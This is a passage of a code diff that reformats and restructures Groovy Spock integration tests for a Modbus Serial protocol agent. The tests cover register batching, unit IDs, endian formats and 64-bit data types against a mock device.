+    ThingAsset device = new ThingAsset("Batching Test Device")
+    device.setRealm(MASTER_REALM)
+
+    device.addOrReplaceAttributes(
+            new Attribute<>("reg0", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(new MetaItem<>(
+                    AGENT_LINK,
+                    new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
+                      it.setReadAddress(1)
+                      it.setRegistersAmount(2)
+                    }
+                    )),
+            new Attribute<>("reg15", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(new MetaItem<>(
+                    AGENT_LINK,
+                    new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
+                      it.setReadAddress(16)
+                      it.setRegistersAmount(2)
+                    }
+                    )),
+            new Attribute<>("reg30", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(new MetaItem<>(
+                    AGENT_LINK,
+                    new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
+                      it.setReadAddress(31)
+                      it.setRegistersAmount(2)
+                    }
+                    ))
+            )
+
+    device = assetStorageService.merge(device)
+
+    then: "batches should be split due to illegal registers"
+    conditions.eventually {
+      def protocol = agentService.getProtocolInstance(agent.id) as ModbusSerialProtocol
+      assert protocol != null
+
+      def cachedBatches = protocol.cachedBatches
+      // Should have created multiple batches due to illegal register gaps
+      def allBatches = cachedBatches.values().flatten()
+      assert allBatches.size() >= 2 // At least 2 batches due to illegal register splits
+
+      device = assetStorageService.find(device.getId(), true)
+      // All attributes should still receive values
+      assert device.getAttribute("reg0").flatMap { it.getValue() }.isPresent()
+      assert device.getAttribute("reg15").flatMap { it.getValue() }.isPresent()
+      assert device.getAttribute("reg30").flatMap { it.getValue() }.isPresent()
+    }
+  }
+
+  def "Modbus Serial Test - Multiple Unit IDs via AgentLink"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.5)
+
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+
+    and: "a single Modbus Serial agent is created for the serial port"
+    def agent = new ModbusSerialAgent("Modbus RTU Agent")
+    agent.setRealm(MASTER_REALM)
+    agent.addOrReplaceAttributes(
+            new Attribute<>(ModbusSerialAgent.SERIAL_PORT, "/dev/ttyUSB0"),
+            new Attribute<>(ModbusSerialAgent.BAUD_RATE, 9600),
+            new Attribute<>(ModbusSerialAgent.DATA_BITS, 8),
+            new Attribute<>(ModbusSerialAgent.STOP_BITS, Stopbits.STOPBITS_1),
+            new Attribute<>(ModbusSerialAgent.PARITY, Paritybit.EVEN),
+            new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
+              "default": new ModbusAgent.ModbusDeviceConfig(ModbusAgent.EndianFormat.BIG_ENDIAN, "", 30)
+            ] as ModbusAgent.DeviceConfigMap)
+            )
+
+    agent = assetStorageService.merge(agent)
+
+    then: "agent should connect"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+
+      agent = assetStorageService.find(agent.getId())
+      assert agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
     }
 
-    def setup() {
-        // Reset mock state before each test
-        latestRequest = null
-        latestWriteRequest = null
-        synchronized (frameBuffer) {
-            frameBuffer.reset()
-        }
+    when: "devices are created with different unit IDs via agentLink"
+    ThingAsset device1 = new ThingAsset("Device on Unit 1")
+    device1.setRealm(MASTER_REALM)
+    device1.addOrReplaceAttributes(
+            new Attribute<>("register1", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(new MetaItem<>(
+                    AGENT_LINK,
+                    new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1) // Unit ID 1 via agentLink
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
+                      it.setReadAddress(1)
+                      it.setRegistersAmount(1)
+                    }
+                    ))
+            )
+
+    ThingAsset device2 = new ThingAsset("Device on Unit 2")
+    device2.setRealm(MASTER_REALM)
+    device2.addOrReplaceAttributes(
+            new Attribute<>("register1", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(new MetaItem<>(
+                    AGENT_LINK,
+                    new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(2) // Unit ID 2 via agentLink
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
+                      it.setReadAddress(1)
+                      it.setRegistersAmount(1)
+                    }
+                    ))
+            )
+
+    device1 = assetStorageService.merge(device1)
+    device2 = assetStorageService.merge(device2)
+
+    then: "both devices should receive values"
+    conditions.eventually {
+      device1 = assetStorageService.find(device1.getId(), true)
+      device2 = assetStorageService.find(device2.getId(), true)
+
+      // Both should have values
+      assert device1.getAttribute("register1").flatMap { it.getValue() }.isPresent()
+      assert device2.getAttribute("register1").flatMap { it.getValue() }.isPresent()
+
+      // Values should be different based on unit ID
+      // Mock returns incrementing values starting from address, but unit ID affects the response
+      def value1 = device1.getAttribute("register1").flatMap { it.getValue() }.get()
+      def value2 = device2.getAttribute("register1").flatMap { it.getValue() }.get()
+
+      assert value1 != null
+      assert value2 != null
     }
 
-    def "Modbus Serial Integration Test - Basic Operations"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 30, delay: 0.5)
+    and: "verify that requests were sent with correct unit IDs"
+    conditions.eventually {
+      // The mock should have received requests with unit ID 1 and 2
+      def lastRequest = latestRequest
+      assert lastRequest != null
+      // Unit ID is the first byte of the Modbus request
+      assert lastRequest[0] == (byte) 1 || lastRequest[0] == (byte) 2
+    }
+  }
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
+  def "Modbus Serial Test - Byte and Word Order Configurations"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.5)
 
-        and: "a Modbus Serial agent is created"
-        def agent = new ModbusSerialAgent("Modbus RTU Device")
-        agent.setRealm(MASTER_REALM)
-        agent.addOrReplaceAttributes(
-                new Attribute<>(ModbusSerialAgent.SERIAL_PORT, "/dev/ttyUSB0"),
-                new Attribute<>(ModbusSerialAgent.BAUD_RATE, 9600),
-                new Attribute<>(ModbusSerialAgent.DATA_BITS, 8),
-                new Attribute<>(ModbusSerialAgent.STOP_BITS, Stopbits.STOPBITS_1),
-                new Attribute<>(ModbusSerialAgent.PARITY, Paritybit.EVEN),
-                new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
-                        "default": new ModbusAgent.ModbusDeviceConfig(ModbusAgent.EndianFormat.BIG_ENDIAN, "101,151-161", 30)
-                ] as ModbusAgent.DeviceConfigMap)
-        )
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
 
-        agent = assetStorageService.merge(agent)
+    and: "four agents are created with different endian format combinations"
+    def agentBigBig = createAgentWithEndianFormat(assetStorageService, "Agent BIG-BIG",
+            ModbusAgent.EndianFormat.BIG_ENDIAN)
 
-        then: "the protocol instance should be created"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert agentService.getProtocolInstance(agent.id) instanceof ModbusSerialProtocol
-        }
+    def agentBigLittle = createAgentWithEndianFormat(assetStorageService, "Agent BIG-LITTLE",
+            ModbusAgent.EndianFormat.BIG_ENDIAN_BYTE_SWAP)
 
-        and: "the connection status should be CONNECTED"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.getId())
-            agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
+    def agentLittleBig = createAgentWithEndianFormat(assetStorageService, "Agent LITTLE-BIG",
+            ModbusAgent.EndianFormat.LITTLE_ENDIAN_BYTE_SWAP)
 
-        when: "a device with partial read configuration is created (missing readValueType)"
-        def device0 = new ThingAsset("Partial Config Device")
-        device0.setRealm(MASTER_REALM)
-        device0.addOrReplaceAttributes(
-                // Partial read config - has readMemoryArea and readAddress but missing readValueType
-                new Attribute<>("partialReadConfig", ValueType.INTEGER).addOrReplaceMeta(new MetaItem<>(
-                        AGENT_LINK,
-                        new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadAddress(50)
-                                    // Missing: readValueType
-                                }
-                ))
-        )
-        device0 = assetStorageService.merge(device0)
+    def agentLittleLittle = createAgentWithEndianFormat(assetStorageService, "Agent LITTLE-LITTLE",
+            ModbusAgent.EndianFormat.LITTLE_ENDIAN)
 
-        then: "the attribute should be linked without creating read polling tasks"
-        conditions.eventually {
-            def protocol = agentService.getProtocolInstance(agent.id) as ModbusSerialProtocol
-            assert protocol != null
-            // No batch groups should be created for incomplete read config
-            assert protocol.batchGroups.isEmpty()
-        }
-
-        when: "the partial config device is removed"
-        assetStorageService.delete([device0.getId()])
-
-        and: "we wait for cleanup to complete"
-        Thread.sleep(500)
-
-        and: "A Thing asset is created with multiple agent links"
-        ThingAsset device = new ThingAsset("Test Modbus Device")
-        device.setRealm(MASTER_REALM)
-
-        // Add various data type attributes
-        device.addOrReplaceAttributes(
-                // UINT16 register
-                new Attribute<>("register1", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(new MetaItem<>(
-                        AGENT_LINK,
-                        new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
-                                    it.setReadAddress(1)
-                                    it.setRegistersAmount(1)
-                                }
-                )),
-                // UINT16 register
-                new Attribute<>("register2", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(new MetaItem<>(
-                        AGENT_LINK,
-                        new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
-                                    it.setReadAddress(3)
-                                    it.setRegistersAmount(1)
-                                }
-                )),
-                // Float (REAL) value
-                new Attribute<>("temperature", ValueType.NUMBER).addOrReplaceMeta(new MetaItem<>(
-                        AGENT_LINK,
-                        new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.INPUT)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.REAL)
-                                    it.setReadAddress(201)
-                                    it.setRegistersAmount(2)
-                                }
-                )),
-                // Coil
-                new Attribute<>("switch1", ValueType.BOOLEAN).addOrReplaceMeta(new MetaItem<>(
-                        AGENT_LINK,
-                        new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.COIL)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.BOOL)
-                                    it.setReadAddress(6)
-                                    it.setWriteMemoryArea(ModbusAgentLink.WriteMemoryArea.COIL)
-                                    it.setWriteAddress(6)
-                                }
-                ))
-        )
-
-        device = assetStorageService.merge(device)
-
-        then: "register batches should be created and attributes should receive values"
-        conditions.eventually {
-            def protocol = agentService.getProtocolInstance(agent.id) as ModbusSerialProtocol
-            assert protocol != null
-
-            // Check that batch groups were created
-            assert protocol.batchGroups.size() > 0
-
-            device = assetStorageService.find(device.getId(), true)
-
-            // Verify values were read
-            assert device.getAttribute("register1").flatMap { it.getValue() }.isPresent()
-            assert device.getAttribute("register2").flatMap { it.getValue() }.isPresent()
-            assert device.getAttribute("temperature").flatMap { it.getValue() }.isPresent()
-            assert device.getAttribute("switch1").flatMap { it.getValue() }.isPresent()
-
-            // Check float value (should be 23.5 from mock)
-            assert Math.abs((device.getAttribute("temperature").flatMap { it.getValue() }.get() as Double) - 23.5) < 0.1
-        }
-
-        when: "a write operation is performed"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(device.getId(), "switch1", true))
-
-        then: "the write should be sent to the device"
-        conditions.eventually {
-            def lastWriteRequest = latestWriteRequest
-            assert lastWriteRequest != null
-            assert lastWriteRequest[0] == (byte) 1  // Unit ID
-            assert lastWriteRequest[1] == (byte) 0x05  // Write single coil function
-        }
-
+    then: "all agents should connect successfully"
+    conditions.eventually {
+      assert assetStorageService.find(agentBigBig.getId()).getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
+      assert assetStorageService.find(agentBigLittle.getId()).getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
+      assert assetStorageService.find(agentLittleBig.getId()).getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
+      assert assetStorageService.find(agentLittleLittle.getId()).getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
     }
 
-    def "Modbus Serial Test - Batching with Illegal Registers"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.5)
+    when: "devices with 32-bit float values are created for each agent"
+    def deviceBigBig = createDeviceWithFloat(assetStorageService, "Device BIG-BIG", agentBigBig, 401)
+    def deviceBigLittle = createDeviceWithFloat(assetStorageService, "Device BIG-LITTLE", agentBigLittle, 411)
+    def deviceLittleBig = createDeviceWithFloat(assetStorageService, "Device LITTLE-BIG", agentLittleBig, 421)
+    def deviceLittleLittle = createDeviceWithFloat(assetStorageService, "Device LITTLE-LITTLE", agentLittleLittle, 431)
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
+    then: "all devices should receive float values"
+    conditions.eventually {
+      deviceBigBig = assetStorageService.find(deviceBigBig.getId(), true)
+      deviceBigLittle = assetStorageService.find(deviceBigLittle.getId(), true)
+      deviceLittleBig = assetStorageService.find(deviceLittleBig.getId(), true)
+      deviceLittleLittle = assetStorageService.find(deviceLittleLittle.getId(), true)
 
-        and: "a Modbus Serial agent with illegal registers is created"
-        def agent = new ModbusSerialAgent("Modbus RTU with Illegal Regs")
-        agent.setRealm(MASTER_REALM)
-        agent.addOrReplaceAttributes(
-                new Attribute<>(ModbusSerialAgent.SERIAL_PORT, "/dev/ttyUSB0"),
-                new Attribute<>(ModbusSerialAgent.BAUD_RATE, 9600),
-                new Attribute<>(ModbusSerialAgent.DATA_BITS, 8),
-                new Attribute<>(ModbusSerialAgent.STOP_BITS, Stopbits.STOPBITS_1),
-                new Attribute<>(ModbusSerialAgent.PARITY, Paritybit.EVEN),
-                new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
-                        "default": new ModbusAgent.ModbusDeviceConfig(ModbusAgent.EndianFormat.BIG_ENDIAN, "6-11,21-26", 30)
-                ] as ModbusAgent.DeviceConfigMap)
-        )
+      // All should have received values (mock returns endian-specific test data)
+      assert deviceBigBig.getAttribute("floatValue").flatMap { it.getValue() }.isPresent()
+      assert deviceBigLittle.getAttribute("floatValue").flatMap { it.getValue() }.isPresent()
+      assert deviceLittleBig.getAttribute("floatValue").flatMap { it.getValue() }.isPresent()
+      assert deviceLittleLittle.getAttribute("floatValue").flatMap {
+        it.getValue()
+      }.isPresent()
 
-        agent = assetStorageService.merge(agent)
+      // BIG-BIG should get the standard value (42.5)
+      def valueBigBig = deviceBigBig.getAttribute("floatValue").flatMap {
+        it.getValue()
+      }.get() as Double
+      assert Math.abs(valueBigBig - 42.5) < 0.1
 
-        and: "attributes are created that would span illegal register ranges"
-        ThingAsset device = new ThingAsset("Batching Test Device")
-        device.setRealm(MASTER_REALM)
+      // Other combinations will have different byte arrangements resulting in different values
+      // This verifies that the byte/word order is being applied
+      def valueBigLittle = deviceBigLittle.getAttribute("floatValue").flatMap {
+        it.getValue()
+      }.get() as Double
+      def valueLittleBig = deviceLittleBig.getAttribute("floatValue").flatMap {
+        it.getValue()
+      }.get() as Double
+      def valueLittleLittle = deviceLittleLittle.getAttribute("floatValue").flatMap {
+        it.getValue()
+      }.get() as Double
 
-        device.addOrReplaceAttributes(
-                new Attribute<>("reg0", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(new MetaItem<>(
-                        AGENT_LINK,
-                        new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
-                                    it.setReadAddress(1)
-                                    it.setRegistersAmount(2)
-                                }
-                )),
-                new Attribute<>("reg15", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(new MetaItem<>(
-                        AGENT_LINK,
-                        new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
-                                    it.setReadAddress(16)
-                                    it.setRegistersAmount(2)
-                                }
-                )),
-                new Attribute<>("reg30", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(new MetaItem<>(
-                        AGENT_LINK,
-                        new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
-                                    it.setReadAddress(31)
-                                    it.setRegistersAmount(2)
-                                }
-                ))
-        )
-
-        device = assetStorageService.merge(device)
-
-        then: "batches should be split due to illegal registers"
-        conditions.eventually {
-            def protocol = agentService.getProtocolInstance(agent.id) as ModbusSerialProtocol
-            assert protocol != null
-
-            def cachedBatches = protocol.cachedBatches
-            // Should have created multiple batches due to illegal register gaps
-            def allBatches = cachedBatches.values().flatten()
-            assert allBatches.size() >= 2  // At least 2 batches due to illegal register splits
-
-            device = assetStorageService.find(device.getId(), true)
-            // All attributes should still receive values
-            assert device.getAttribute("reg0").flatMap { it.getValue() }.isPresent()
-            assert device.getAttribute("reg15").flatMap { it.getValue() }.isPresent()
-            assert device.getAttribute("reg30").flatMap { it.getValue() }.isPresent()
-        }
+      // Values should differ based on byte/word order (exact values depend on mock implementation)
+      assert valueBigBig != valueBigLittle || valueBigBig != valueLittleBig || valueBigBig != valueLittleLittle
     }
 
-    def "Modbus Serial Test - Multiple Unit IDs via AgentLink"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.5)
+    when: "devices with 64-bit double values are created"
+    def device64BigBig = createDeviceWithDouble(assetStorageService, "Device64 BIG-BIG", agentBigBig, 501)
+    def device64LittleLittle = createDeviceWithDouble(assetStorageService, "Device64 LITTLE-LITTLE", agentLittleLittle, 511)
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
+    then: "64-bit values should also be affected by byte/word order"
+    conditions.eventually {
+      device64BigBig = assetStorageService.find(device64BigBig.getId(), true)
+      device64LittleLittle = assetStorageService.find(device64LittleLittle.getId(), true)
 
-        and: "a single Modbus Serial agent is created for the serial port"
-        def agent = new ModbusSerialAgent("Modbus RTU Agent")
-        agent.setRealm(MASTER_REALM)
-        agent.addOrReplaceAttributes(
-                new Attribute<>(ModbusSerialAgent.SERIAL_PORT, "/dev/ttyUSB0"),
-                new Attribute<>(ModbusSerialAgent.BAUD_RATE, 9600),
-                new Attribute<>(ModbusSerialAgent.DATA_BITS, 8),
-                new Attribute<>(ModbusSerialAgent.STOP_BITS, Stopbits.STOPBITS_1),
-                new Attribute<>(ModbusSerialAgent.PARITY, Paritybit.EVEN),
-                new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
-                        "default": new ModbusAgent.ModbusDeviceConfig(ModbusAgent.EndianFormat.BIG_ENDIAN, "", 30)
-                ] as ModbusAgent.DeviceConfigMap)
-        )
+      assert device64BigBig.getAttribute("doubleValue").flatMap { it.getValue() }.isPresent()
+      assert device64LittleLittle.getAttribute("doubleValue").flatMap {
+        it.getValue()
+      }.isPresent()
 
-        agent = assetStorageService.merge(agent)
+      def doubleBigBig = device64BigBig.getAttribute("doubleValue").flatMap {
+        it.getValue()
+      }.get() as Double
+      def doubleLittleLittle = device64LittleLittle.getAttribute("doubleValue").flatMap {
+        it.getValue()
+      }.get() as Double
 
-        then: "agent should connect"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
+      // BIG-BIG should get the standard value (999.888)
+      assert Math.abs(doubleBigBig - 999.888) < 0.001
 
-            agent = assetStorageService.find(agent.getId())
-            assert agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
+      // LITTLE-LITTLE should get a different value due to byte/word swapping
+      assert doubleBigBig != doubleLittleLittle
+    }
+  }
 
-        when: "devices are created with different unit IDs via agentLink"
-        ThingAsset device1 = new ThingAsset("Device on Unit 1")
-        device1.setRealm(MASTER_REALM)
-        device1.addOrReplaceAttributes(
-                new Attribute<>("register1", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(new MetaItem<>(
-                        AGENT_LINK,
-                        new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)  // Unit ID 1 via agentLink
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
-                                    it.setReadAddress(1)
-                                    it.setRegistersAmount(1)
-                                }
-                ))
-        )
+  def "Modbus Serial Test - 64-bit Data Types (LINT, ULINT, LREAL)"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 15, delay: 0.5)
 
-        ThingAsset device2 = new ThingAsset("Device on Unit 2")
-        device2.setRealm(MASTER_REALM)
-        device2.addOrReplaceAttributes(
-                new Attribute<>("register1", ValueType.POSITIVE_INTEGER).addOrReplaceMeta(new MetaItem<>(
-                        AGENT_LINK,
-                        new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(2)  // Unit ID 2 via agentLink
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadValueType(ModbusAgentLink.ModbusDataType.UINT)
-                                    it.setReadAddress(1)
-                                    it.setRegistersAmount(1)
-                                }
-                ))
-        )
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
 
-        device1 = assetStorageService.merge(device1)
-        device2 = assetStorageService.merge(device2)
+    and: "a Modbus Serial agent is created"
+    def agent = new ModbusSerialAgent("Modbus RTU 64-bit Test")
+    agent.setRealm(MASTER_REALM)
+    agent.addOrReplaceAttributes(
+            new Attribute<>(ModbusSerialAgent.SERIAL_PORT, "/dev/ttyUSB0"),
+            new Attribute<>(ModbusSerialAgent.BAUD_RATE, 9600),
+            new Attribute<>(ModbusSerialAgent.DATA_BITS, 8),
+            new Attribute<>(ModbusSerialAgent.STOP_BITS, Stopbits.STOPBITS_1),
+            new Attribute<>(ModbusSerialAgent.PARITY, Paritybit.EVEN),
+            new Attribute<>(ModbusAgent.DEVICE_CONFIG, [
+              "default": new ModbusAgent.ModbusDeviceConfig(ModbusAgent.EndianFormat.BIG_ENDIAN, "", 50)
+            ] as ModbusAgent.DeviceConfigMap)
+            )
 
-        then: "both devices should receive values"
-        conditions.eventually {
-            device1 = assetStorageService.find(device1.getId(), true)
-            device2 = assetStorageService.find(device2.getId(), true)
+    agent = assetStorageService.merge(agent)
 
-            // Both should have values
-            assert device1.getAttribute("register1").flatMap { it.getValue() }.isPresent()
-            assert device2.getAttribute("register1").flatMap { it.getValue() }.isPresent()
+    and: "the agent is linked to a device with 64-bit data types"
+    def device = new ThingAsset("64-bit Test Device")
+    device.setRealm(MASTER_REALM)
+    device.setParent(agent)
+    device.addOrReplaceAttributes(
+            // LREAL - Double precision float at address 301 (4 registers, 1-based = 300 protocol)
+            new Attribute<>("doubleValue", ValueType.NUMBER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.LREAL)
+                      it.setReadAddress(301)
+                    }
+                    )
+                    ),
+            // LINT - 64-bit signed integer at address 311 (4 registers, 1-based = 310 protocol)
+            new Attribute<>("longSignedValue", ValueType.LONG).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.LINT)
+                      it.setReadAddress(311)
+                    }
+                    )
+                    ),
+            // ULINT - 64-bit unsigned integer at address 321 (4 registers, 1-based = 320 protocol)
+            new Attribute<>("longUnsignedValue", ValueType.BIG_INTEGER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadValueType(ModbusAgentLink.ModbusDataType.ULINT)
+                      it.setReadAddress(321)
+                    }
+                    )
+                    )
+            )
 
-            // Values should be different based on unit ID
-            // Mock returns incrementing values starting from address, but unit ID affects the response
-            def value1 = device1.getAttribute("register1").flatMap { it.getValue() }.get()
-            def value2 = device2.getAttribute("register1").flatMap { it.getValue() }.get()
+    device = assetStorageService.merge(device)
 
-            assert value1 != null
-            assert value2 != null
-        }
-
-        and: "verify that requests were sent with correct unit IDs"
-        conditions.eventually {
-            // The mock should have received requests with unit ID 1 and 2
-            def lastRequest = latestRequest
-            assert lastRequest != null
-            // Unit ID is the first byte of the Modbus request
-            assert lastRequest[0] == (byte) 1 || lastRequest[0] == (byte) 2
-        }
+    then: "the agent should connect successfully"
+    conditions.eventually {
+      def actualAgent = assetStorageService.find(agent.getId(), true) as ModbusSerialAgent
+      assert actualAgent.getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
     }
 
-    def "Modbus Serial Test - Byte and Word Order Configurations"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 15, delay: 0.5)
+    and: "all 64-bit attributes should receive values"
+    conditions.eventually {
+      device = assetStorageService.find(device.getId(), true)
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
+      // Check LREAL (double) - should be 123.456789
+      def doubleValue = device.getAttribute("doubleValue").flatMap {
+        it.getValue()
+      }.orElse(null)
+      assert doubleValue != null
+      assert doubleValue instanceof Number
+      assert Math.abs(((Number) doubleValue).doubleValue() - 123.456789d) < 0.000001
 
-        and: "four agents are created with different endian format combinations"
-        def agentBigBig = createAgentWithEndianFormat(assetStorageService, "Agent BIG-BIG",
-                ModbusAgent.EndianFormat.BIG_ENDIAN)
+      // Check LINT (signed long) - should be -9223372036854775000L
+      def longSignedValue = device.getAttribute("longSignedValue").flatMap {
+        it.getValue()
+      }.orElse(null)
+      assert longSignedValue != null
+      assert longSignedValue instanceof Long
+      assert longSignedValue == -9223372036854775000L
 
-        def agentBigLittle = createAgentWithEndianFormat(assetStorageService, "Agent BIG-LITTLE",
-                ModbusAgent.EndianFormat.BIG_ENDIAN_BYTE_SWAP)
-
-        def agentLittleBig = createAgentWithEndianFormat(assetStorageService, "Agent LITTLE-BIG",
-                ModbusAgent.EndianFormat.LITTLE_ENDIAN_BYTE_SWAP)
-
-        def agentLittleLittle = createAgentWithEndianFormat(assetStorageService, "Agent LITTLE-LITTLE",
-                ModbusAgent.EndianFormat.LITTLE_ENDIAN)
-
-        then: "all agents should connect successfully"
-        conditions.eventually {
-            assert assetStorageService.find(agentBigBig.getId()).getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-            assert assetStorageService.find(agentBigLittle.getId()).getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
